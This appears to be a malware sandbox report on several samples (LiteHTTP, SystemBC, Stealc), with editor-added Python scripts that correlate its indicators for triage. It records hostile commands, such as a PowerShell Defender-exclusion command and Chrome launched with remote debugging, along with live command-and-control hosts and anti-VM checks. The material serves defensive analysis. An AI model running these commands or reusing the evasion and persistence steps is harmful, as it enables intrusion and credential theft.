Analysis: behavioral9
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20241010-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
"C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe"
Network
Files
memory/2856-0-0x0000000001FA0000-0x00000000023A0000-memory.dmp
memory/2856-1-0x0000000001FA0000-0x00000000023A0000-memory.dmp
memory/2856-3-0x0000000001FA0000-0x00000000023A0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
100s
Max time network
150s
Command Line
Signatures
LiteHTTP
Litehttp family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\gGHmO5nH\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 1336 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3356 wrote to memory of 1336 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
"C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\gGHmO5nH\Anubis.exe""
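Added example, not part of the sandbox report: the Run key written under ...\CurrentVersion\Run\Anubis and the path handed to Add-MpPreference -ExclusionPath above are the same file, which is the point worth surfacing in triage rather than two unrelated signatures. The script below parses the recorded indicator row (undoing the report's backslash escaping of the REG_SZ value) and the PowerShell command line (whose inner quotes are not escaped), then correlates them. The two input strings are copied from the tables above; the tag names and the list of user-writable directory markers are the editor's own choices.

```python
import re

# Constructed sample input: the Run-key indicator row and the PowerShell command line
# recorded in the behavioral14 analysis, copied verbatim from the report.
RUN_KEY_ROW = (
    r"| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000"
    r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "
    r'"\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\gGHmO5nH\\Anubis.exe\"" '
    r"| C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |"
)
POWERSHELL_CMDLINE = (
    r'"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command '
    r'"Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\gGHmO5nH\Anubis.exe""'
)

# Directory markers an unprivileged user can write to (assumption: a short hand-picked list).
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def parse_row(row: str) -> list[str]:
    """Split one '| a | b | c | d |' table row into stripped cells."""
    return [c.strip() for c in row.strip().strip("|").split("|")]


def decode_reg_string(raw: str) -> str:
    """Undo the report's C-style escaping of a REG_SZ value (backslash-quote, double backslash)."""
    s = raw.strip()
    if len(s) >= 2 and s[0] == '"' and s[-1] == '"':
        s = s[1:-1]
    s = re.sub(r"\\(.)", r"\1", s)  # \\ -> \ and \" -> "
    return s.strip('"')  # the value itself was written with surrounding quotes


def parse_run_key(row: str) -> dict:
    """Extract value name, decoded target path and writing process from a 'Set value' row."""
    _desc, indicator, process, _target = parse_row(row)
    key, _, raw_value = indicator.partition(" = ")
    return {
        "value_name": key.rsplit("\\", 1)[-1],
        "path": decode_reg_string(raw_value),
        "process": process,
        "is_run_key": "\\currentversion\\run\\" in key.lower(),
    }


def parse_defender_exclusion(cmdline: str) -> dict:
    """Pull the Add-MpPreference exclusion out of a powershell.exe command line.

    The inner quotes are not escaped in the recorded command line, so the path is
    taken up to the next double quote instead of using a shell-style tokenizer.
    """
    m = re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+\"?([^\"]+)", cmdline, re.I)
    return {
        "kind": m.group(1) if m else None,
        "path": m.group(2).strip() if m else None,
        "execution_policy_bypass": bool(re.search(r"-ExecutionPolicy\s+Bypass", cmdline, re.I)),
    }


def correlate(run_row: str, ps_cmdline: str) -> list[str]:
    """Return finding tags that tie the persistence entry to the Defender exclusion."""
    run = parse_run_key(run_row)
    excl = parse_defender_exclusion(ps_cmdline)
    findings = []
    if run["is_run_key"] and any(m in run["path"].lower() for m in USER_WRITABLE):
        findings.append("run_key_targets_user_writable_path")
    if excl["execution_policy_bypass"]:
        findings.append("powershell_execution_policy_bypass")
    if excl["path"] and run["path"].lower() == excl["path"].lower():
        findings.append("defender_exclusion_matches_run_key_target")
    return findings


if __name__ == "__main__":
    print(parse_run_key(RUN_KEY_ROW))
    print(parse_defender_exclusion(POWERSHELL_CMDLINE))
    print(correlate(RUN_KEY_ROW, POWERSHELL_CMDLINE))
```

On a live host the same correlation is done by reading HKCU\...\CurrentVersion\Run and comparing it with the ExclusionPath list from Get-MpPreference; an exclusion that names a file under AppData\Roaming, added by a process that just created the Run entry, is the combination to alert on.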
Network
| Country | Destination | Domain | Proto |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 150.171.27.10:443 | | tcp |
| US | 150.171.27.10:443 | | tcp |
| US | 150.171.27.10:443 | | tcp |
| US | 150.171.27.10:443 | | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | | tcp |
| US | 150.171.27.10:443 | | tcp |
Files
memory/3356-0-0x00007FFCAC8E3000-0x00007FFCAC8E5000-memory.dmp
memory/3356-1-0x000001E6DEFB0000-0x000001E6DEFC2000-memory.dmp
memory/3356-2-0x000001E6DF350000-0x000001E6DF360000-memory.dmp
memory/3356-3-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/3356-4-0x00007FFCAC8E3000-0x00007FFCAC8E5000-memory.dmp
memory/3356-5-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/3356-8-0x000001E6F9AE0000-0x000001E6FA008000-memory.dmp
memory/1336-20-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-19-0x0000023E0DA70000-0x0000023E0DA92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3vcaq2g.dn5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1336-21-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-22-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-25-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\tjdkln\ermh.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\tjdkln\ermh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\tjdkln\ermh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
"C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\ProgramData\tjdkln\ermh.exe
C:\ProgramData\tjdkln\ermh.exe
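Added example, not part of the sandbox report: the signature tables above show two of the dropped executables (vertualiziren.exe and ermh.exe) opening the VirtualBox ACPI key, the Software\Wine key and both BIOS version values, and hiding their threads from debuggers, while the loader and Gxtuum.exe only read locale keys and drop .job files under C:\Windows\Tasks. The script below turns those rows into a per-process evasion profile so the anti-analysis stages stand out from the loader. The event triples are copied from the tables above; the rule patterns, tag names and weights are the editor's own choices (hypervisor- and Wine-only artifacts weigh most, BIOS strings are a weak hint, locale and persistence rows are recorded but not scored).

```python
import re
from collections import defaultdict

# Constructed sample input: (signature, indicator, process) triples copied from the
# behavioral2 signature tables. Paths are bound to short names only for readability.
VERT = r"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
ERMH = r"C:\ProgramData\tjdkln\ermh.exe"
LOADER = r"C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe"
GXTUUM = r"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
SID = r"\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000"
NLS = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"

EVENTS = [
    ("Identifies VirtualBox via ACPI registry values", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", VERT),
    ("Identifies VirtualBox via ACPI registry values", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", ERMH),
    ("Checks BIOS information in registry", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion", ERMH),
    ("Checks BIOS information in registry", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", VERT),
    ("Checks BIOS information in registry", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion", VERT),
    ("Checks BIOS information in registry", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", ERMH),
    ("Checks computer location settings", SID + r"\Control Panel\International\Geo\Nation", LOADER),
    ("Checks computer location settings", SID + r"\Control Panel\International\Geo\Nation", GXTUUM),
    ("Identifies Wine through registry keys", SID + r"\Software\Wine", VERT),
    ("Identifies Wine through registry keys", SID + r"\Software\Wine", ERMH),
    ("Suspicious use of NtSetInformationThreadHideFromDebugger", "N/A", VERT),
    ("Suspicious use of NtSetInformationThreadHideFromDebugger", "N/A", ERMH),
    ("Drops file in Windows directory", r"C:\Windows\Tasks\Gxtuum.job", LOADER),
    ("Drops file in Windows directory", r"C:\Windows\Tasks\Test Task17.job", VERT),
    ("System Location Discovery: System Language Discovery", NLS, LOADER),
    ("System Location Discovery: System Language Discovery", NLS, GXTUUM),
    ("System Location Discovery: System Language Discovery", NLS, VERT),
    ("System Location Discovery: System Language Discovery", NLS, ERMH),
]

# (pattern over "signature | indicator", tag, weight). Weights are the editor's assumption:
# artifacts that only exist under a hypervisor or Wine weigh most, BIOS strings are a weak
# hint, and locale / persistence rows are tagged with weight 0 so they show up but don't score.
RULES = [
    (r"ACPI\\DSDT\\VBOX__", "acpi_vbox", 3),
    (r"\\Software\\Wine$", "wine_key", 3),
    (r"\\(System|Video)BiosVersion$", "bios_version", 1),
    (r"HideFromDebugger", "thread_hide_from_debugger", 2),
    (r"\\Geo\\Nation$", "geo_nation", 0),
    (r"\\NLS\\Language$", "nls_language", 0),
    (r"\\Windows\\Tasks\\.+\.job$", "task_job_file", 0),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def profile(events) -> dict:
    """Per-process tag list and evasion score; repeated rows count once per tag."""
    hits = defaultdict(set)
    for signature, indicator, process in events:
        text = f"{signature} | {indicator}"
        for pattern, tag, weight in RULES:
            if re.search(pattern, text, re.I):
                hits[basename(process)].add((tag, weight))
    return {
        proc: {"tags": sorted(t for t, _ in tw), "score": sum(w for _, w in tw)}
        for proc, tw in hits.items()
    }


def flag_evasive(events, threshold: int = 5) -> list[str]:
    """Processes whose anti-VM / anti-debug score reaches the threshold (editor's default: 5)."""
    return sorted(p for p, info in profile(events).items() if info["score"] >= threshold)


if __name__ == "__main__":
    for proc, info in profile(EVENTS).items():
        print(f"{proc:24s} score={info['score']:2d} {info['tags']}")
    print("evasive:", flag_evasive(EVENTS))
```

Scoring unique tags rather than rows matters: the BIOS check appears twice per process and the NLS language check in every process, and counting rows would let the most common, least specific signals dominate.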
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 104.115.34.42:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4266 | towerbingobongoboom.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2840-24-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-26-0x0000000077AE4000-0x0000000077AE6000-memory.dmp
memory/2840-27-0x0000000000401000-0x0000000000403000-memory.dmp
memory/2840-28-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-31-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-32-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-33-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-36-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-38-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | e28cdaad92fc263cef7f0db464eddce6 |
| SHA1 | a602433ff5456cc62c2e318ca1387afc32814d57 |
| SHA256 | 7044e6c29a3b9101569631d080f5374ea5a68c2df16d46f66dd2b3202e3f17b5 |
| SHA512 | 85876fe2685f3923b95182bb25f3b3f1f73c34450193ccae65b85653278ef0c7d9c5a0763e96c7e7107005ee8155e47753b6304b9607f747f1bde36d1fbafb67 |
memory/2840-40-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-42-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-41-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-43-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-44-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-45-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-46-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-47-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-48-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-49-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-50-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-51-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-52-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-53-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-54-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-55-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-56-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-57-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-58-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-59-0x0000000000400000-0x0000000000840000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Stealc
Stealc family
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2316 set thread context of 2656 | N/A | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 504
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef81a9758,0x7fef81a9768,0x7fef81a9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1376,i,15432426287862528783,1503333093539893040,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
